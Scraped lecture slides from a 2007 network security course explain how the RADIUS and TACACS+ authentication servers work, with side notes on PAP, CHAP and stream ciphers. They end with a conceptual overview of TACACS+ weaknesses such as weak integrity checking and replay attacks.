Get documents about "radius
Document Sample
Authentication servers:
RADIUS
TACACS+
CS772
Fall 2007
• User, through a initiates PPP authentication to the NAS.
• NAS prompts for username and password (if Password
Authentication Protocol [PAP]) or challenge (if Challenge
Handshake Authentication Protocol [CHAP]).
• User replies.
• RADIUS client sends username and encrypted password
to the RADIUS server.
• RADIUS server responds with Accept, Reject, or
Challenge.
• The RADIUS client acts upon services and services
parameters bundled with Accept or Reject.
1. User, through a initiates PPP authentication to the NAS.
2. NAS prompts for username and password (if Password Authentication
Protocol [PAP]) or challenge (if Challenge Handshake Authentication
Protocol [CHAP]).
3. User replies.
4. RADIUS client sends username and encrypted password to the RADIUS
server.
5. RADIUS server responds with Accept, Reject, or Challenge.
6. The RADIUS client acts upon services and services parameters bundled
with Accept or Reject.
Radius: Introduction
• RADIUS (Remote Authentication Dial In User Service)
• A server for remote user authentication and accounting. Its primary use is for Internet
Service Providers, though it may as well be used on any network that needs a
centralized authentication and/or accounting service for its workstations.
• http://www.gnu.org/software/radius/#introduction
• Authentication Schemes:
– user supplies his authentication data to the server either directly by answering the terminal
server's login/password prompts
– server obtains the user's personal data from one of the following places:
• System Database
– The user's login and password are stored in /etc/passwd on the server
• Internal Database
– The user's login ID, password etc. are stored in the internal radius database. The user's
password is stored in encrypted form using either MD5 or DES hash, whichever is appropriate
• SQL authentication
– User's details are stored in an SQL database. The database structure is fully
determined by the system administrator, Radius does not restrict it in any way.
• PAM authentication
– User is authenticated via PAM (Pluggable Authentication Service) framework.
RADIUS – Introduction ( contd.)
• Radius has three built-in accounting schemes:
– Unix accounting
• Accounting data are stored in radutmp/radwtmp files and can be
viewed using radwho and radlast commands. Both commands are
upward compatible with their Unix counterparts who and last.
– Detailed accounting
• The detailed accounting information is stored in plain text format.
The resulting files can easily be parsed using standard text
processing tools (grep, awk, etc.)
– SQL accounting
• Upon receiving accounting information Radius stores it in an SQL
database. This can then be processed using standard SQL queries.
• Radius is extensible and new accounting methods can
be added using the extension language.
RADIUS Protocol
• http://www.untruth.org/~josh/security/radius/radius-auth.html (Analysis)
• http://www.ietf.org/rfc/rfc2865.txt
(specification)
Why use RADIUS?
• It is commonly used for embedded network devices such as routers,
modem servers, switches, etc. It is used for several reasons:
– The embedded systems generally cannot deal with a large number of
users with distinct authentication information.
– RADIUS facilitates centralized user administration, which is important
for several of these applications. Many ISPs have tens of thousands,
hundreds of thousands, or even millions of users.
– RADIUS consistently provides some level of protection against a
sniffing, active attacker. Other remote authentication protocols provide
either intermittent protection, inadequate protection or non-existent
protection. RADIUS's primary competition for remote authentication is
TACACS+ and LDAP. LDAP natively provides no protection against
sniffing or active attackers. TACACS+ is subtly flawed.
RADIUS Issues
• The User-Password protection scheme is a stream-cipher, where an MD5
hash is used as an ad hoc pseudorandom number generator (PRNG). The
security of the cipher rests on the strength of MD5 for this type of use and
the selection of the shared secret.
Side issue: Stream Ciphers
• A stream cipher is a type of symmetric encryption algorithm. Stream ciphers can be designed to
be exceptionally fast, much faster than any block cipher .
• While block ciphers operate on large blocks of data, stream ciphers typically operate on smaller
units of plaintext, usually bits. With a stream cipher, the transformation of these smaller plaintext
units will vary, depending on when they are encountered during the encryption process.
• A stream cipher generates what is called a keystream (a sequence of bits used as a key).
Encryption is accomplished by combining the keystream with the plaintext, usually with the bitwise
XOR operation.
• Current interest in stream ciphers is most commonly attributed to the appealing theoretical
properties of the one-time pad. A one-time pad uses a string of bits that is generated completely at
random. The keystream is the same length as the plaintext message and the random string is
combined using bitwise XOR with the plaintext to produce the ciphertext. Since the entire
keystream is random, even an opponent with infinite computational resources can only guess the
plaintext if he or she sees the ciphertext.
• Stream ciphers were developed as an approximation to the action of the one-time pad. While
contemporary stream ciphers are unable to provide the satisfying theoretical security of the one -
time pad, they are at least practical.
• As of now there is no stream cipher that has emerged as a de facto standard. The most widely
used stream cipher is RC4. Interestingly, certain modes of operation of a block cipher effectively
transform it into a keystream generator and in this way, any block cipher can be used as a stream
cipher; as in DES in CFB or OFB modes However, stream ciphers with a dedicated design are
typically much faster.
Side Issue: PAP
• Password Authentication Protocol, sometimes abbreviated PAP, is a simple
authentication protocol used to authenticate a user to a network access server used
for example by internet service providers. PAP is used by Point to Point Protocol.
Authentication is a process of validating a user before accessing the resources.
Almost all network operating system remote servers support PAP.
• PAP transmits unencrypted ASCII passwords over the network and is therefore
considered insecure. It is used as a last resort when the remote server does not
support a stronger authentication protocol, like CHAP or EAP (while the last is
actually a framework).
• PAP works as follows:
– 1. After the link is established, the client sends a password and username to the server
bundled as one LCP packet.
– 2. The server (the modem card in the modem racks) recognizes the packet as a PAP
authentication request, and sends the data to the RADIUS server (the database of
usernames and passwords).
– 3. RADIUS either validates the request and sends back an acknowledgement to the
modem card, terminates the connection, or offers the client another chance. Passwords
are sent as plain text.
– The difference between PAP authentication and a manual or scripted login, is that PAP is
not interactive. The username and password are entered in the client's dialing software
and sent as one data package as soon as the modems have established a connection,
rather than the server sending a login prompt and waiting for a response.
Side Issue: CHAP
• CHAP (Challenge-Handshake Authentication Protocol) is a more
secure procedure for connecting to a system than the Password
Authentication Procedure (PAP).
• Here's how CHAP works:
– After the link is made, the server sends a challenge message to the
connection requestor. The requestor responds with a value obtained by
using a one-way hash function.
– The server checks the response by comparing it its own calculation of
the expected hash value.
– If the values match, the authentication is acknowledged; otherwise
theconnection is usually terminated.
• At any time, the server can request the connected party to send a
new challenge message. Because CHAP identifiers are changed
frequently and because authentication can be requested by the
server at any time, CHAP provides more security than PAP.
RFC1334 defines both CHAP and PAP.
TACACS+
• A major paradigm shift in remote network access is the shift from terminal access to LAN
access. Single users are connecting to the corporate network with computers (notebooks or
PCs from home) that can sustain complete network connections. These users no longer
connect as unfriendly terminals but connect in the same way they do at work: as a LAN user.
• TACACS+ (Terminal Access Controller Access-Control System Plus) is a protocol which
provides access control for routers, network access servers (NAS) and other networked
computing devices via one or more centralized servers. TACACS+ provides separate
authentication, authorization and accounting services.
• Whereas RADIUS combines authentication and authorization in a user profile, TACACS+
separates the two operations. Another difference is that TACACS+ uses the Transmission
Control Protocol (TCP) while RADIUS uses the User Datagram Protocol (UDP). Most
administrators recommend using TACACS+ because TCP is seen as a more reliable protocol.
• http://www.cisco.com/warp/public/614/7.html
• Advantages of the TACACS+ Protocol:
– TCP-based for more security
– Provide three separate protocol components, each of which can be implemented on separate
servers
• Authentication provides complete server control of the authentication process, which includes:
– login and password query
– Challenge/response
– Messaging support (any)
– Encrypted in MD5
– Replaceable with Kerberos 5
• Authorization allows "remote" access control and enhanced granularity.
Features include:
– One authentication
– Authorization for each service
– Per-user access list and user profile
– Users can belong to groups
– IP and Telnet support (IPX, ARA future)
– Any access or command and permission or restrictions
Examples of the "AAA"
Functionality
• The authorization component in TACACS+ allows greater levels of control over user
actions and can be used to create separate administrative groups that are based on
user functionality.
• For example, a network manager might want to restrict a user to perform certain
functions on the access server or router. Within the access server, a user might be
restricted to PPP or SLIP and only be permitted to connect to a specific host address.
• Another example of the flexibility of the authorization subsystem is forcing a user to
connect to a particular host if an attempt is made to connect to a specific host. In the
case of the router's command line user interface, a restriction might be placed on
executing particular EXEC commands such as reload.
• The authentication protocol can also generate an autocommand. Once a user is
authenticated, this runs any command within the access server system and is very
powerful for complete access management. Network managers can use the
accounting component to track user activity for a security audit trail or to provide
billing information. A report might be structured to provide: user identity, start and
stop times, executed commands, number of packets, and number of bytes.
• Password aging is another example of the capabilities that are now available with
TACACS+. A server supporting TACACS+ can send a message back to users, telling
them to change their passwords as part of the login sequence. They will not be
allowed access unless they change their passwords at that time.
Vulnerabilities
• Lack of integrity checking. Almost no integrity checking exists in TACACS+. The only
check defined in the RFC draft is to make sure the sum of component lengths
matches the total size of the packet.
• Vulnerability to replay attacks.
– TACACS+ lacks virtually any protection against replay attacks. The only requirement is
that packets have a correct sequence number.
– Since all TACACS+ sessions start with a sequence number of 1 (not a vulnerability in
and of itself), the TACACS+ server will always process a packet with seq_no set to 1.
– Especially easy to replay are accounting sessions, which consist of only one packet sent
to the server (with a seq_no of 1). Obviously, it is also possible to replay the packets with
certain bits flipped, such as to get different task_id's in case a billing system is smart
enough to check for duplicate records.
– The fact that TACACS+ uses TCP provides no security against replay, as new TCP
connections may be opened by an attacker for replaying recorded TACACS+ sessions.
